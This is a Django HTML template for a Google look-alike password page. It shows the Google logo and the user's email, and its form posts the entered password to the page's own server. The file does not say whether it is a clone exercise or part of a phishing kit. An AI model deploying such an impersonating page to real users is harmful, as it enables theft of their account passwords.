{% load static %}
<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="{% static 'styles/password.css' %}">
    <title>Login Page</title>
</head>

<body>
    <div class="sign-in-page">
        <img src="https://upload.wikimedia.org/wikipedia/commons/2/2f/Google_2015_logo.svg">
        <p class="h1">
            Welcome
        </p>
        <p class="para-below-h1">
            {{email}}
        </p>

        <form method="post">
            {% csrf_token %}
            <input type="password" id="pass" placeholder="Password" name="password">
            {% if message %}
            <p style="color:red">Couldn't found your google account</p>
            {% endif %}
            <div class="show-password">
                <input type="checkbox" id="show" name="show" value="show">
                <label for="show"> Show password</label>
            </div>
            <div class="submit-area">
                <a href="">
                    Forget password?
                </a>
                <button type="submit" class="next">
                    Sign In
                </button>
            </div>
        </form>

    </div>
    <footer>
        <select name="language" id="ganguage">
            <option value="english">English (United States)</option>
            <option value="hindi">Hindi</option>
            <option value="marathi">Marathi</option>
            <option value="german">German</option>
        </select>
        <a href="">
            Help
        </a>
        <a href="">
            Privacy
        </a>
        <a href="">
            Terms
        </a>
    </footer>

</body>

</html>